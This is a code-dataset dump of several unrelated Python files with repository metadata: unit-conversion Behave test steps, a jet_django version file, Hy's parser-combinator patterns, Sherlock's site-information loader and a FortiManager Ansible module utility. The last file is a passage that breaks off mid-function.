@when('the user converts from bits to zebibits and back')
def step_implementation(context):
context.source = random.randrange(100000)
context.expected = context.source / (2.**70)
context.outcome = context.source * context.converter[BinaryUnitNames.bits][BinaryUnitNames.zebibits]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.zebibits][BinaryUnitNames.bits]
return
@when('the user converts from bits to zebibytes and back')
def step_implementation(context):
context.source = random.randrange(100000)
context.expected = context.source / (8 * 2.**70)
context.outcome = context.source * context.converter[BinaryUnitNames.bits][BinaryUnitNames.zebibytes]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.zebibytes][BinaryUnitNames.bits]
return
@when('the user converts from bits to yobibits and back')
def step_implementation(context):
# the inputs need to be much larger to effectively test this
context.source = random.randrange(10**10, 10**30)
context.expected = context.source / (2.**80)
context.outcome = context.source * context.converter[BinaryUnitNames.bits][BinaryUnitNames.yobibits]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.yobibits][BinaryUnitNames.bits]
return
@when('the user converts from bits to yobibytes and back')
def step_implementation(context):
context.source = random.randrange(10**20, 10**30)
context.expected = context.source / (8 * 2.**80)
context.outcome = context.source * context.converter[BinaryUnitNames.bits][BinaryUnitNames.yobibytes]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.yobibytes][BinaryUnitNames.bits]
return
| 41.951872 | 114 | 0.758445 |
4a226b098fa9492ca56b1c0f1dfd5acbcaef70b3 | 73 | py | Python | packages/jet_django/jet_django/__init__.py | loftwah/jet-bridge | b352d6514b1cc44d4d870966fa9f94afdf446096 | [
"MIT"
] | null | null | null | packages/jet_django/jet_django/__init__.py | loftwah/jet-bridge | b352d6514b1cc44d4d870966fa9f94afdf446096 | [
"MIT"
] | null | null | null | packages/jet_django/jet_django/__init__.py | loftwah/jet-bridge | b352d6514b1cc44d4d870966fa9f94afdf446096 | [
"MIT"
] | null | null | null | VERSION = '0.9.1'
default_app_config = 'jet_django.apps.JetDjangoConfig'
| 24.333333 | 54 | 0.780822 |
4a226b2d01ca2b7063b231bc711ca451eec7e5d2 | 3,199 | py | Python | hy/model_patterns.py | datschy/hy | 2c5c7d657648d65c59f045d10a53773eba1a5d76 | [
"MIT"
] | null | null | null | hy/model_patterns.py | datschy/hy | 2c5c7d657648d65c59f045d10a53773eba1a5d76 | [
"MIT"
] | null | null | null | hy/model_patterns.py | datschy/hy | 2c5c7d657648d65c59f045d10a53773eba1a5d76 | [
"MIT"
] | null | null | null | # Copyright 2021 the authors.
# This file is part of Hy, which is free software licensed under the Expat
# license. See the LICENSE.
"Parser combinators for pattern-matching Hy model trees."
from hy.models import HyExpression, HySymbol, HyKeyword, HyString, HyList
from funcparserlib.parser import (
some, skip, many, finished, a, Parser, NoParseError, State)
from functools import reduce
from itertools import repeat
from collections import namedtuple
from operator import add
from math import isinf
FORM = some(lambda _: True)
SYM = some(lambda x: isinstance(x, HySymbol))
KEYWORD = some(lambda x: isinstance(x, HyKeyword))
STR = some(lambda x: isinstance(x, HyString))
def sym(wanted):
"Parse and skip the given symbol or keyword."
if wanted.startswith(":"):
return skip(a(HyKeyword(wanted[1:])))
return skip(some(lambda x: isinstance(x, HySymbol) and x == wanted))
def whole(parsers):
"""Parse the parsers in the given list one after another, then
expect the end of the input."""
if len(parsers) == 0:
return finished >> (lambda x: [])
if len(parsers) == 1:
return parsers[0] + finished >> (lambda x: x[:-1])
return reduce(add, parsers) + skip(finished)
def _grouped(group_type, parsers): return (
some(lambda x: isinstance(x, group_type)) >>
(lambda x: group_type(whole(parsers).parse(x)).replace(x, recursive=False)))
def brackets(*parsers):
"Parse the given parsers inside square brackets."
return _grouped(HyList, parsers)
def pexpr(*parsers):
"Parse the given parsers inside a parenthesized expression."
return _grouped(HyExpression, parsers)
def dolike(head):
"Parse a `do`-like form."
return pexpr(sym(head), many(FORM))
def notpexpr(*disallowed_heads):
"""Parse any object other than a HyExpression beginning with a
HySymbol equal to one of the disallowed_heads."""
return some(lambda x: not (
isinstance(x, HyExpression) and
x and
isinstance(x[0], HySymbol) and
x[0] in disallowed_heads))
def unpack(kind):
"Parse an unpacking form, returning it unchanged."
return some(lambda x:
isinstance(x, HyExpression)
and len(x) > 0
and isinstance(x[0], HySymbol)
and x[0] == "unpack-" + kind)
def times(lo, hi, parser):
"""Parse `parser` several times (`lo` to `hi`) in a row. `hi` can be
float('inf'). The result is a list no matter the number of instances."""
@Parser
def f(tokens, s):
result = []
for _ in range(lo):
(v, s) = parser.run(tokens, s)
result.append(v)
end = s.max
try:
for _ in (repeat(1) if isinf(hi) else range(hi - lo)):
(v, s) = parser.run(tokens, s)
result.append(v)
except NoParseError as e:
end = e.state.max
return result, State(s.pos, end)
return f
Tag = namedtuple('Tag', ['tag', 'value'])
def tag(tag_name, parser):
"""Matches the given parser and produces a named tuple `(Tag tag value)`
with `tag` set to the given tag name and `value` set to the parser's
value."""
return parser >> (lambda x: Tag(tag_name, x))
| 33.673684 | 80 | 0.649265 |
4a226b4f5f239385de995bd2182b5d25a9b2d7fc | 8,764 | py | Python | sherlock/sites.py | Ahzaam/sherlock | e8c638d0ad48baa858927e7ed9614cf2f6ca9d1d | [
"MIT"
] | null | null | null | sherlock/sites.py | Ahzaam/sherlock | e8c638d0ad48baa858927e7ed9614cf2f6ca9d1d | [
"MIT"
] | null | null | null | sherlock/sites.py | Ahzaam/sherlock | e8c638d0ad48baa858927e7ed9614cf2f6ca9d1d | [
"MIT"
] | null | null | null | """Sherlock Sites Information Module
This module supports storing information about web sites.
This is the raw data that will be used to search for usernames.
"""
import os
import json
import operator
import requests
import sys
class SiteInformation():
def __init__(self, name, url_home, url_username_format, username_claimed,
username_unclaimed, information):
"""Create Site Information Object.
Contains information about a specific web site.
Keyword Arguments:
self -- This object.
name -- String which identifies site.
url_home -- String containing URL for home of site.
url_username_format -- String containing URL for Username format
on site.
NOTE: The string should contain the
token "{}" where the username should
be substituted. For example, a string
of "https://somesite.com/users/{}"
indicates that the individual
usernames would show up under the
"https://somesite.com/users/" area of
the web site.
username_claimed -- String containing username which is known
to be claimed on web site.
username_unclaimed -- String containing username which is known
to be unclaimed on web site.
information -- Dictionary containing all known information
about web site.
NOTE: Custom information about how to
actually detect the existence of the
username will be included in this
dictionary. This information will
be needed by the detection method,
but it is only recorded in this
object for future use.
Return Value:
Nothing.
"""
self.name = name
self.url_home = url_home
self.url_username_format = url_username_format
self.username_claimed = username_claimed
self.username_unclaimed = username_unclaimed
self.information = information
return
def __str__(self):
"""Convert Object To String.
Keyword Arguments:
self -- This object.
Return Value:
Nicely formatted string to get information about this object.
"""
return f"{self.name} ({self.url_home})"
class SitesInformation():
def __init__(self, data_file_path=None):
"""Create Sites Information Object.
Contains information about all supported web sites.
Keyword Arguments:
self -- This object.
data_file_path -- String which indicates path to data file.
The file name must end in ".json".
There are 3 possible formats:
* Absolute File Format
For example, "c:/stuff/data.json".
* Relative File Format
The current working directory is used
as the context.
For example, "data.json".
* URL Format
For example,
"https://example.com/data.json", or
"http://example.com/data.json".
An exception will be thrown if the path
to the data file is not in the expected
format, or if there was any problem loading
the file.
If this option is not specified, then a
default site list will be used.
Return Value:
Nothing.
"""
if data_file_path is None:
# The default data file is the live data.json which is in the GitHub repo. The reason why we are using
# this instead of the local one is so that the user has the most up to date data. This prevents
# users from creating issue about false positives which has already been fixed or having outdated data
data_file_path = "https://raw.githubusercontent.com/Ahzaam/sherlock/master/sherlock/resources/data.json"
# Ensure that specified data file has correct extension.
if not data_file_path.lower().endswith(".json"):
raise FileNotFoundError(f"Incorrect JSON file extension for data file '{data_file_path}'.")
if "http://" == data_file_path[:7].lower() or "https://" == data_file_path[:8].lower():
# Reference is to a URL.
try:
response = requests.get(url=data_file_path)
except Exception as error:
raise FileNotFoundError(f"Problem while attempting to access "
f"data file URL '{data_file_path}': "
f"{str(error)}"
)
if response.status_code == 200:
try:
site_data = response.json()
except Exception as error:
raise ValueError(f"Problem parsing json contents at "
f"'{data_file_path}': {str(error)}."
)
else:
raise FileNotFoundError(f"Bad response while accessing "
f"data file URL '{data_file_path}'."
)
else:
# Reference is to a file.
try:
with open(data_file_path, "r", encoding="utf-8") as file:
try:
site_data = json.load(file)
except Exception as error:
raise ValueError(f"Problem parsing json contents at "
f"'{data_file_path}': {str(error)}."
)
except FileNotFoundError as error:
raise FileNotFoundError(f"Problem while attempting to access "
f"data file '{data_file_path}'."
)
self.sites = {}
# Add all of site information from the json file to internal site list.
for site_name in site_data:
try:
self.sites[site_name] = \
SiteInformation(site_name,
site_data[site_name]["urlMain"],
site_data[site_name]["url"],
site_data[site_name]["username_claimed"],
site_data[site_name]["username_unclaimed"],
site_data[site_name]
)
except KeyError as error:
raise ValueError(f"Problem parsing json contents at "
f"'{data_file_path}': "
f"Missing attribute {str(error)}."
)
return
def site_name_list(self):
"""Get Site Name List.
Keyword Arguments:
self -- This object.
Return Value:
List of strings containing names of sites.
"""
site_names = sorted([site.name for site in self], key=str.lower)
return site_names
def __iter__(self):
"""Iterator For Object.
Keyword Arguments:
self -- This object.
Return Value:
Iterator for sites object.
"""
for site_name in self.sites:
yield self.sites[site_name]
def __len__(self):
"""Length For Object.
Keyword Arguments:
self -- This object.
Return Value:
Length of sites object.
"""
return len(self.sites)
| 40.762791 | 116 | 0.469991 |
4a226bbf840600d6206f548fa474a3d10e01d1af | 49,005 | py | Python | venv/lib/python3.6/site-packages/ansible_collections/fortinet/fortimanager/plugins/module_utils/napi.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 1 | 2020-01-22T13:11:23.000Z | 2020-01-22T13:11:23.000Z | venv/lib/python3.6/site-packages/ansible_collections/fortinet/fortimanager/plugins/module_utils/napi.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 12 | 2020-02-21T07:24:52.000Z | 2020-04-14T09:54:32.000Z | venv/lib/python3.6/site-packages/ansible_collections/fortinet/fortimanager/plugins/module_utils/napi.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | null | null | null | # This code is part of Ansible, but is an independent component.
# This particular file snippet, and this file snippet only, is BSD licensed.
# Modules you write using this snippet, which is embedded dynamically by Ansible
# still belong to the author of the module, and may assign their own license
# to the complete work.
#
# (c) 2020-2021 Fortinet, Inc
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.module_utils.basic import _load_params
import sys
import datetime
import yaml
def check_galaxy_version(schema):
params = _load_params()
params_keys = list(params.keys())
if 'method' in params_keys and 'method' not in schema:
error_message = 'Legacy playbook detected, please revise the playbook or install latest legacy'
error_message += ' fortimanager galaxy collection: #ansible-galaxy collection install -f fortinet.fortimanager:1.0.5'
sys.stderr.write(error_message)
sys.exit(1)
def check_parameter_bypass(schema, module_level2_name):
params = _load_params()
if 'bypass_validation' in params and params['bypass_validation'] is True:
top_level_schema = dict()
for key in schema:
if key != module_level2_name:
top_level_schema[key] = schema[key]
elif not params[module_level2_name] or type(params[module_level2_name]) is dict:
top_level_schema[module_level2_name] = dict()
top_level_schema[module_level2_name]['required'] = False
top_level_schema[module_level2_name]['type'] = 'dict'
elif type(params[module_level2_name]) is list:
top_level_schema[module_level2_name] = dict()
top_level_schema[module_level2_name]['required'] = False
top_level_schema[module_level2_name]['type'] = 'list'
else:
raise Exception('Value of %s must be a dict or list' % (module_level2_name))
return top_level_schema
return schema
class NAPIManager(object):
jrpc_urls = None
perobject_jrpc_urls = None
module_primary_key = None
url_params = None
module = None
conn = None
module_name = None
module_level2_name = None
top_level_schema_name = None
def __init__(self, jrpc_urls, perobject_jrpc_urls, module_primary_key, url_params, module, conn, top_level_schema_name=None):
self.jrpc_urls = jrpc_urls
self.perobject_jrpc_urls = perobject_jrpc_urls
self.module_primary_key = module_primary_key
self.url_params = url_params
self.module = module
self.conn = conn
self.process_workspace_lock()
self.module_name = self.module._name
self.module_level2_name = self.module_name.split('.')[-1][5:]
self.top_level_schema_name = top_level_schema_name
self.system_status = self.get_system_status()
self.version_check_warnings = list()
self._nr_exported_playbooks = 0
self._nr_valid_selectors = 0
def process_workspace_lock(self):
self.conn.process_workspace_locking(self.module.params)
def _method_proposed(self):
return 'proposed_method' in self.module.params and not not self.module.params['proposed_method']
def _propose_method(self, default_method):
if 'proposed_method' in self.module.params and self.module.params['proposed_method']:
return self.module.params['proposed_method']
return default_method
def _version_matched(self, revisions):
if not revisions or not self.system_status:
# if system version is not determined, give up version checking
return True, None
sys_version_value = int(self.system_status['Major']) * 10000 + int(self.system_status['Minor']) * 100 + int(self.system_status['Patch'])
versions = list(revisions.keys())
versions.sort(key=lambda x: int(x.split('.')[0]) * 10000 + int(x.split('.')[1]) * 100 + int(x.split('.')[2]))
nearest_index = -1
for i in range(len(versions)):
version_value = int(versions[i].split('.')[0]) * 10000 + int(versions[i].split('.')[1]) * 100 + int(versions[i].split('.')[2])
if version_value <= sys_version_value:
nearest_index = i
if nearest_index == -1:
return False, 'not supported until in v%s' % (versions[0])
if revisions[versions[nearest_index]] is True:
return True, None
latest_index = -1
for i in range(nearest_index + 1, len(versions)):
if revisions[versions[i]] is True:
latest_index = i
break
earliest_index = nearest_index
while earliest_index >= 0:
if revisions[versions[earliest_index]] is True:
break
earliest_index -= 1
earliest_index = 0 if earliest_index < 0 else earliest_index
if latest_index == -1:
return False, 'not supported since v%s' % (versions[earliest_index])
else:
return False, 'not supported since %s, before %s' % (versions[earliest_index], versions[latest_index])
def _get_basic_url(self, is_perobject):
url_libs = None
if is_perobject:
url_libs = [i for i in self.perobject_jrpc_urls]
else:
url_libs = [i for i in self.jrpc_urls]
for uparam in self.url_params:
if not self.module.params[uparam]:
raise AssertionError('param %s MUST NOT be empty' % (uparam))
the_url = None
if 'adom' in self.url_params and not url_libs[0].endswith('{adom}'):
adom = self.module.params['adom']
if adom == 'global':
for url in url_libs:
if '/global/' in url:
the_url = url
break
if not the_url:
self.module.fail_json(msg='No global url for the request, please use other adom.')
else:
for url in url_libs:
if '/adom/{adom}/' in url:
the_url = url
break
if not the_url:
self.module.fail_json(msg='No url for the requested adom:%s, please use other adom.' % (adom))
else:
the_url = url_libs[0]
if not the_url:
raise AssertionError('the_url is not expected to be NULL')
_param_applied = list()
for uparam in self.url_params:
token_hint = '/%s/{%s}/' % (uparam, uparam)
token = '/%s/%s/' % (uparam, self.module.params[uparam])
if token_hint in the_url:
_param_applied.append(uparam)
the_url = the_url.replace(token_hint, token)
for uparam in self.url_params:
if uparam in _param_applied:
continue
token_hint = '{%s}' % (uparam)
token = self.module.params[uparam]
the_url = the_url.replace(token_hint, token)
return the_url
def _get_base_perobject_url(self, mvalue):
url_getting = self._get_basic_url(True)
if not url_getting.endswith('}'):
# in case of non-regular per-object url.
return url_getting
last_token = url_getting.split('/')[-1]
second_last_token = url_getting.split('/')[-2]
if last_token != '{' + second_last_token + '}':
raise AssertionError('wrong last_token received')
return url_getting.replace('{' + second_last_token + '}', str(mvalue))
def get_object(self, mvalue):
url_getting = self._get_base_perobject_url(mvalue)
params = [{'url': url_getting}]
response = self.conn.send_request('get', params)
return response
def update_object(self, mvalue):
url_updating = self._get_base_perobject_url(mvalue)
if not self.top_level_schema_name:
raise AssertionError('top level schema name MUST NOT be NULL')
params = [{'url': url_updating, self.top_level_schema_name: self.__tailor_attributes(self.module.params[self.module_level2_name])}]
response = self.conn.send_request(self._propose_method('update'), params)
return response
def create_objejct(self):
url_creating = self._get_basic_url(False)
if not self.top_level_schema_name:
raise AssertionError('top level schema name MUST NOT be NULL')
params = [{'url': url_creating, self.top_level_schema_name: self.__tailor_attributes(self.module.params[self.module_level2_name])}]
return self.conn.send_request(self._propose_method('set'), params)
def delete_object(self, mvalue):
url_deleting = self._get_base_perobject_url(mvalue)
params = [{'url': url_deleting}]
return self.conn.send_request('delete', params)
def get_system_status(self):
params = [{'url': '/cli/global/system/status'}]
response = self.conn.send_request('get', params)
if response[0] == 0:
if 'data' not in response[1]:
raise AssertionError()
return response[1]['data']
return None
def _compare_subnet(self, object_remote, object_present):
if type(object_remote) is not list and len(object_remote) != 2:
return True
tokens = object_present.split('/')
if len(tokens) != 2:
return True
try:
subnet_number = int(tokens[1])
if subnet_number < 0 or subnet_number > 32:
return True
remote_subnet_number = sum(bin(int(x)).count('1') for x in object_remote[1].split('.'))
if object_remote[0] != tokens[0] or remote_subnet_number != subnet_number:
return True
else:
return False
except Exception as e:
return True
return True
def _check_object_difference(self, object_remote, object_present):
for key in object_present:
value = object_present[key]
if not value:
continue
if key not in object_remote or not object_remote[key]:
return True
value_type = type(value)
if value_type is list:
return True
elif value_type is dict:
if type(object_remote[key]) is not dict:
return True
elif self._check_object_difference(object_remote[key], value):
return True
else:
value_string = str(value)
if type(object_remote[key]) is not list and str(object_remote[key]) != value_string:
return True
elif type(object_remote[key]) is list:
if not self._compare_subnet(object_remote[key], value_string):
return False
elif len(object_remote[key]) > 1 or str(object_remote[key][0]) != value_string:
return True
return False
def _update_required(self, robject):
object_status = robject[0]
if object_status != 0:
return False
object_remote = robject[1]['data']
object_present = self.module.params[self.module_level2_name]
return self._check_object_difference(object_remote, object_present)
def _process_with_mkey(self, mvalue):
mobject = self.get_object(mvalue)
update_required = self._update_required(mobject)
if self._method_proposed():
update_required = True
if self.module.params['state'] == 'present':
if mobject[0] == 0:
if update_required:
return self.update_object(mvalue)
else:
self.module.exit_json(message='Object update skipped!')
else:
return self.create_objejct()
elif self.module.params['state'] == 'absent':
# in case the `GET` method returns nothing... see module `fmgr_antivirus_mmschecksum`
# if mobject[0] == 0:
return self.delete_object(mvalue)
# else:
# self.do_nonexist_exit()
else:
raise AssertionError('Not Reachable')
def _process_without_mkey(self):
if self.module.params['state'] == 'absent':
self.module.fail_json(msg='this module doesn\'t not support state:absent because of no primary key.')
return self.create_objejct()
def process_generic(self, method, param):
response = self.conn.send_request(method, param)
self.do_exit(response)
def process_exec(self, argument_specs=None):
track = [self.module_level2_name]
if 'bypass_validation' not in self.module.params or self.module.params['bypass_validation'] is False:
self.check_versioning_mismatch(track,
argument_specs[self.module_level2_name] if self.module_level2_name in argument_specs else None,
self.module.params[self.module_level2_name] if self.module_level2_name in self.module.params else None)
the_url = self.jrpc_urls[0]
if 'adom' in self.url_params and not self.jrpc_urls[0].endswith('{adom}'):
if self.module.params['adom'] == 'global':
for _url in self.jrpc_urls:
if '/global/' in _url:
the_url = _url
break
else:
for _url in self.jrpc_urls:
if '/adom/{adom}/' in _url:
the_url = _url
break
for _param in self.url_params:
token_hint = '{%s}' % (_param)
token = '%s' % (self.module.params[_param])
the_url = the_url.replace(token_hint, token)
api_params = [{'url': the_url}]
if self.module_level2_name in self.module.params:
if not self.top_level_schema_name:
raise AssertionError('top level schema name MUST NOT be NULL')
api_params[0][self.top_level_schema_name] = self.__tailor_attributes(self.module.params[self.module_level2_name])
response = self.conn.send_request('exec', api_params)
self.do_exit(response)
def __extract_renamed_urls(self, urls):
_param_set = list()
for url in urls:
tokens = url.split('/')
if len(tokens) < 2:
continue
token_2 = tokens[-2]
token_1 = tokens[-1]
if '{%s}' % (token_2) == token_1 and token_2 not in _param_set:
_param_set.append(token_2)
return _param_set
def process_rename(self, metadata):
params = self.module.params
if params['rename']['selector'] not in metadata:
raise AssertionError('unknown selector: %s' % (params['rename']['selector']))
selector = params['rename']['selector']
rename_urls = metadata[selector]['urls']
rename_mkey = metadata[selector]['mkey']
rename_params = metadata[selector]['params']
for _url_param in self.__extract_renamed_urls(rename_urls):
if _url_param not in rename_params:
rename_params.append(_url_param)
rename_revisions = metadata[selector]['revision']
matched, checking_message = self._version_matched(rename_revisions)
if not matched:
self.version_check_warnings.append('selector:%s %s' % (selector, checking_message))
real_params_keys = set()
if self.module.params['rename']['self']:
real_params_keys = set(self.module.params['rename']['self'].keys())
if real_params_keys != set(rename_params):
self.module.fail_json(msg='expect params in self:%s, given params:%s' % (list(rename_params), list(real_params_keys)))
url = None
if 'adom' in rename_params and not rename_urls[0].endswith('{adom}'):
if params['rename']['self']['adom'] == 'global':
for _url in rename_urls:
if '/global/' in _url:
url = _url
break
else:
for _url in rename_urls:
if '/adom/{adom}/' in _url:
url = _url
break
else:
url = rename_urls[0]
if not url:
self.module.fail_json(msg='can not find url in following sets:%s! please check params: adom' % (rename_urls))
_param_applied = list()
for _param in rename_params:
token_hint = '/%s/{%s}' % (_param, _param)
token = '/%s/%s' % (_param, params['rename']['self'][_param])
if token_hint in url:
_param_applied.append(_param)
url = url.replace(token_hint, token)
for _param in rename_params:
if _param in _param_applied:
continue
token_hint = '{%s}' % (_param)
token = params['rename']['self'][_param]
url = url.replace(token_hint, token)
if rename_mkey and rename_mkey not in params['rename']['target']:
self.module.fail_json(msg='Must give the primary key/value in target: %s!' % (mkey))
api_params = [{'url': url,
'data': params['rename']['target']}]
response = self.conn.send_request('update', api_params)
self.do_exit(response)
def process_clone(self, metadata):
if self.module.params['clone']['selector'] not in metadata:
raise AssertionError('selector is expected in parameters')
selector = self.module.params['clone']['selector']
clone_params_schema = metadata[selector]['params']
clone_urls = metadata[selector]['urls']
clone_revisions = metadata[selector]['revision']
matched, checking_message = self._version_matched(clone_revisions)
if not matched:
self.version_check_warnings.append('selector:%s %s' % (selector, checking_message))
real_params_keys = set()
if self.module.params['clone']['self']:
real_params_keys = set(self.module.params['clone']['self'].keys())
if real_params_keys != set(clone_params_schema):
self.module.fail_json(msg='expect params in self:%s, given params:%s' % (list(clone_params_schema), list(real_params_keys)))
url = None
if 'adom' in clone_params_schema and not clone_urls[0].endswith('{adom}'):
if self.module.params['clone']['self']['adom'] == 'global':
for _url in clone_urls:
if '/global/' in _url:
url = _url
break
else:
for _url in clone_urls:
if '/adom/{adom}/' in _url:
url = _url
break
else:
url = clone_urls[0]
if not url:
self.module.fail_json(msg='can not find url in following sets:%s! please check params: adom' % (clone_urls))
_param_applied = list()
for _param in clone_params_schema:
token_hint = '/%s/{%s}' % (_param, _param)
token = '/%s/%s' % (_param, self.module.params['clone']['self'][_param])
if token_hint in url:
_param_applied.append(_param)
url = url.replace(token_hint, token)
for _param in clone_params_schema:
if _param in _param_applied:
continue
token_hint = '{%s}' % (_param)
token = self.module.params['clone']['self'][_param]
url = url.replace(token_hint, token)
mkey = metadata[selector]['mkey']
if mkey and mkey not in self.module.params['clone']['target']:
self.module.fail_json(msg='Must give the primary key/value in target: %s!' % (mkey))
api_params = [{'url': url,
'data': self.module.params['clone']['target']}]
response = self.conn.send_request('clone', api_params)
self.do_exit(response)
def process_move(self, metadata):
if self.module.params['move']['selector'] not in metadata:
raise AssertionError('selector is expected in parameters')
selector = self.module.params['move']['selector']
move_params = metadata[selector]['params']
move_urls = metadata[selector]['urls']
move_revisions = metadata[selector]['revision']
matched, checking_message = self._version_matched(move_revisions)
if not matched:
self.version_check_warnings.append('selector:%s %s' % (selector, checking_message))
if not len(move_urls):
raise AssertionError('unexpected move urls set')
real_params_keys = set()
if self.module.params['move']['self']:
real_params_keys = set(self.module.params['move']['self'].keys())
if real_params_keys != set(move_params):
self.module.fail_json(msg='expect params in self:%s, given params:%s' % (list(move_params), list(real_params_keys)))
url = None
if 'adom' in move_params and not move_urls[0].endswith('{adom}'):
if self.module.params['move']['self']['adom'] == 'global':
for _url in move_urls:
if '/global/' in _url:
url = _url
break
else:
for _url in move_urls:
if '/adom/{adom}/' in _url:
url = _url
break
else:
url = move_urls[0]
if not url:
self.module.fail_json(msg='can not find url in following sets:%s! please check params: adom' % (move_urls))
_param_applied = list()
for _param in move_params:
token_hint = '/%s/{%s}' % (_param, _param)
token = '/%s/%s' % (_param, self.module.params['move']['self'][_param])
if token_hint in url:
_param_applied.append(_param)
url = url.replace(token_hint, token)
for _param in move_params:
if _param in _param_applied:
continue
token_hint = '{%s}' % (_param)
token = self.module.params['move']['self'][_param]
url = url.replace(token_hint, token)
api_params = [{'url': url,
'option': self.module.params['move']['action'],
'target': self.module.params['move']['target']}]
response = self.conn.send_request('move', api_params)
self.do_exit(response)
def __fix_remote_object_internal(self, robject, module_schema, log):
if type(robject) is not dict:
return True
need_bypass = False
keys_to_delete = list()
for key in robject:
value = robject[key]
# keys are internal in FMG devices.
if key not in module_schema:
keys_to_delete.append(key)
continue
# key is found
attr_schema = module_schema[key]
attr_type = attr_schema['type']
if attr_type in ['str', 'int']:
# Do immediate fix.
if type(value) is list:
if len(value) == 1:
robject[key] = value[0]
log.write('\tfix list-to-atomic key:%s\n' % (key))
else:
need_bypass = True
elif type(value) is dict:
need_bypass = True
if not value or value == 'null':
log.write('\tdelete empty key:%s\n' % (key))
keys_to_delete.append(key)
elif attr_type == 'dict':
if 'options' in attr_schema and type(value) is dict:
need_bypass |= self.__fix_remote_object_internal(value, attr_schema['options'], log)
else:
need_bypass = True
if not value or value == 'null':
log.write('\tdelete empty key:%s\n' % (key))
keys_to_delete.append(key)
elif attr_type == 'list':
if 'options' in attr_schema and type(value) is list:
for sub_value in value:
need_bypass |= self.__fix_remote_object_internal(sub_value, attr_schema['options'], log)
else:
need_bypass = True
if type(value) is list and not len(value) or value == 'null' or not value:
log.write('\tdelete empty key:%s\n' % (key))
keys_to_delete.append(key)
else:
raise AssertionError('Unexpected attributetype.')
for key in keys_to_delete:
log.write('\tdelete unrecognized key:%s\n' % (key))
del robject[key]
return need_bypass
def __append_whiteblank_per_line(self, blob, num_of_blank):
ret = ' ' * num_of_blank
ret += blob.replace('\n', '\n%s' % (' ' * num_of_blank))
return ret
def _generate_playbook(self, counter, export_path, selector, robject, state_present, need_bypass, url_params, params_schema, log):
prefix_text ='''- name: Exported Playbook
hosts: fortimanager00
connection: httpapi
collections:
- fortinet.fortimanager
vars:
ansible_httpapi_use_ssl: True
ansible_httpapi_validate_certs: False
ansible_httpapi_port: 443
tasks:
'''
with open('%s/%s_%s.yml' % (export_path, selector, counter), 'w') as f:
f.write(prefix_text)
f.write(' - name: exported config for %s\n' % (selector))
f.write(' fmgr_%s:\n' % (selector))
if need_bypass:
f.write(' bypass_validation: true\n')
if state_present:
f.write(' state: present\n')
for url_param_key in params_schema:
if url_param_key not in url_params:
continue
url_param_value = url_params[url_param_key]
f.write(' %s: %s\n' % (url_param_key, url_param_value))
f.write(' %s:\n' % (selector))
f.write(self.__append_whiteblank_per_line(yaml.dump(robject), 8))
log.write('\texported playbook: %s/%s_%s.yml\n' % (export_path, selector, counter))
self._nr_exported_playbooks += 1
def _process_export_response(self, selector, response, schema_invt, log, export_path, url_params, params_schema):
response_code = response[0]
response_data = response[1]
if response_code != 0 or 'data' not in response_data:
log.write('\tno configuration data found\n')
return
if selector not in schema_invt:
log.write('\trequested object has no corresponding ansible module\n')
return
state_present = schema_invt[selector]['stated']
module_schema = schema_invt[selector]['options']
remote_objects = response_data['data']
counter = 0
if type(remote_objects) is list:
for remote_object in remote_objects:
need_bypass = self.__fix_remote_object_internal(remote_object, module_schema, log)
self._generate_playbook(counter, export_path, selector, remote_object, state_present, need_bypass, url_params, params_schema, log)
counter += 1
elif type(remote_objects) is dict:
need_bypass = self.__fix_remote_object_internal(remote_objects, module_schema, log)
self._generate_playbook(counter, export_path, selector, remote_objects, state_present, need_bypass, url_params, params_schema, log)
counter += 1
if not counter:
self._nr_valid_selectors += 1
def _process_export_per_selector(self, selector, schema, param, log, export_path, process, schema_invt):
# make urls from schema and parameters provided.
url = None
export_urls = schema['urls']
if 'adom' in param and not export_urls[0].endswith('{adom}'):
if param['adom'] == 'global':
for _url in export_urls:
if '/global/' in _url:
url = _url
break
else:
for _url in export_urls:
if '/adom/{adom}/' in _url:
url = _url
break
if not url:
url = export_urls[0]
_param_applied = list()
for _param_key in param:
_param_value = param[_param_key]
if _param_key == 'adom' and _param_value.lower() == 'global':
continue
token_hint = '/%s/{%s}' % (_param_key, _param_key)
token = '/%s/%s' % (_param_key, _param_value)
if token_hint in url:
_param_applied.append(_param_key)
url = url.replace(token_hint, token)
for _param_key in param:
if _param_key in _param_applied:
continue
if _param_key == 'adom' and _param_value.lower() == 'global':
continue
token_hint = '{%s}' % (_param_key)
token = param[_param_key]
url = url.replace(token_hint, token)
tokens = url.split('/')
if tokens[-1].startswith('{') and tokens[-1].endswith('}'):
new_url = ''
for token in tokens[:-1]:
new_url += '/%s' % (token)
new_url = new_url.replace('//', '/')
url = new_url
unresolved_parameter = False
tokens = url.split('/')
for token in tokens:
